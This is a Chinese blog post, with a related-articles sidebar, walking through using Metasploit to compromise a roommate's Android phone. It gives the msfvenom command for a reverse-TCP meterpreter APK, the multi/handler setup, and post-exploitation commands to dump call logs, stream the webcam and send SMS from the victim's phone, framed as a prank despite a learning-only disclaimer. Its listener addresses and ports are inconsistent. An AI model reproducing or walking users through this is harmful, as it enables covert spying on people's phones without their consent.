实战Metasploit之安卓渗透舍友

最新推荐文章于 2023-07-28 02:08:13 发布
最新推荐文章于 2023-07-28 02:08:13 发布
阅读量6.8k 收藏 68
点赞数 12
分类专栏: 技术分享

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用

安卓手机在移动端占有很高的比重,今天就带领大家一块利用Metasploit进行一次渗透之旅,安卓渗透和windows其实差不多的,好啦,不废话了,正题开始。

环境:kali linux 2016.02和安卓手机一部

准备工作:当然是查看自己的ip~

正式开始:

首先,生成一个反弹木马:在终端输入

 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.104 lport=44444 r>/root/123.apk

-p  Payload to use

Lhost  攻击者的ip,就是自己的ip

Lport  攻击者的端口,(有高端口可能不是很容易被杀的一说,本人没证实)

r>/root/123.apk 文件生成的路径及文件名

然后就是搭建自己的客户端。

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

可以用指令 show options 查看我们所需要写的参数

这里我们可以看到,只需要更改lhost lport的参数。

LAOQ7HYO8P[0V)PDEVQ]1TO

set lhost 192.168.0.104

set lport 4444

执行Exploit指令

手机连接成功……接下来~~

首先看看手机是否经过root    check_root

N459]S][2`N[{T1@`OSURRJ

结果发现这部机子root

dump_calllog    通话记录

(这是我看到的信息)

 DFF6985CB9973611940172C2AA3AD8C2

webcam_stream   调用摄相头

 CN`KIO9E(ZO91CRH(E2P(48

最后顺便黑一下舍友,给他发一个消息

 H`U%MYH5YHMLMMZK@}%N$QS

Send_sms -d 电话 -t 内容

有没有很简单呢~~其实还有好多功能了,在这不一一列举了,大家自己发现吧~   

转载请注明:即刻安全 » 实战Metasploit之安卓渗透舍友

大方子
关注
  • 12
    点赞
  • 68
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
android dump 完整so,android上的Tcpdump跟踪 – 无法加载“/ system / bin / tcpdump”所需的库“libssl.so”...
weixin_30677191的博客
05-27 328
我需要在我的Android设备上执行tcpdump跟踪.我的设置:将tcpdump文件推送到SD卡adb push filepath/tcpdump /sdcard/tcpdump将文件复制到/ system / bin为tcpdump文件授予root权限adb shellcd /system/binsuchmod 777 tcpdump运行tcpdump tracetcpdump -vv -s ...
Android 日志分析01-命令篇
wxz的博客
08-07 2038
Android开发者日志分析常用的一些命令收录
使用Metasploit入侵安卓手机(超详细哦)
热门推荐
chengman3837的博客
03-29 1万+
本文原创作者:newbie,本文属i春秋原创奖励计划,未经许可禁止转载! 1.环境准备: Kali2.0(msfVENOM、metasploit) 安卓手机 2.利用过程: 使用msfvenom生成apk木马 msfvenom -p android/meterpreter/rev...
如何使用Metasploit安卓手机进行控制
weixin_44420521的博客
04-22 543
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。创建负载我们需要两台虚拟机:Kali Linux和安卓模拟器。 打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。一旦打开终端提示符下输入以下命令,使用msfvenom工具来创
客户端渗透之——使用Metasploit渗透Android系统
冰河的专栏
01-24 4748
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633320 可以创建一个新的APK文件,也可以将攻击载荷注入到一个现有的APK文件来攻击Android平台,这里我们使用第一种方法。 1.创建APK文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168....
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
关于Metasploit Framework与渗透测试相关知识
最新发布
12-28
**Metasploit Framework详解与渗透测试实践** 渗透测试是一种安全评估方法,通过模拟黑客攻击来检测系统的脆弱性。在这个过程中,Metasploit Framework扮演着核心工具的角色,它为安全专家提供了大量的漏洞利用代码...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
metasploit中使用lnk漏洞渗透测试.doc
03-18
Metasploit 中使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
[RK3288][Android6.0] 调试笔记 --- 系统Dump Callstack方法
Kris Fei's blog
07-31 1521
Platform: Rockchip OS: Android 6.0 Kernel: 3.10.92像Java, C++带类继承,有时候分析流程会找晕,可以通过dump callstack快速了解调用过程Java中: Log.e("kris",Log.getStackTraceString(new Throwable()));C++中: #include <utils/CallStack.h
android dump内存办法大全
KingDigGrave的博客
01-03 6774
1.ida运行脚本 autoi,fp,begin,end; fp=fopen("D:\\xx.so","wb"); begin=0xAC338000; end=0xAC393000; for(i=begin;i { fputs(Byte(i),fp); }   2.gdb dump dump binary memoryC:\Users\DW\Desktop\baidu_jia
Android内存泄漏查找和解决
苦逼程序员的笔记
06-27 1万+
内存泄漏的概念 一个内存泄漏的例子 Java中”失效”的private修饰符 回头看内存泄漏例子泄漏的重点 强引用与弱引用 解决内部类的内存泄漏 Context造成的泄漏 使用LeakCanary工具查找内存泄漏
Android开发中遇到的bug
JackChan
10-06 1万+
Android开发过程中遇到的bug及其解决方法
实训实训实训
IWANnaaa的博客
04-03 4748
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.1...
使用msf工具对安卓手机进行渗透攻击———超详细
weixin_71669458的博客
07-28 1万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
kali的学习笔记篇(六)metasploit安卓后门
Kind&红衣的博客
08-12 3506
环境: kali-linux-2018.-2-amd-64.iso android 支持外网监听 0x01: //生成安卓木马: msfvenom -p android/meterpreter/reverse_tcp LHOST=[myIP] LPORT=55555 R &amp;amp;amp;amp;gt; [akpNAME].apk 0x02: //加载攻击模块 use exploit/m...
安卓apk 客户端渗透<高级>
weixin_68281676的博客
09-12 3101
Failed to verify signed artifacts报错解决
kali linux渗透实战metasploit
04-11
使用Kali Linux操作系统可以使用Metasploit工具进行渗透测试。 Metasploit是一款功能强大的框架,可用于漏洞分析和漏洞利用。它具有多种模块,包括扫描、漏洞利用和后渗透攻击。使用它可以对系统进行测试,寻找系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值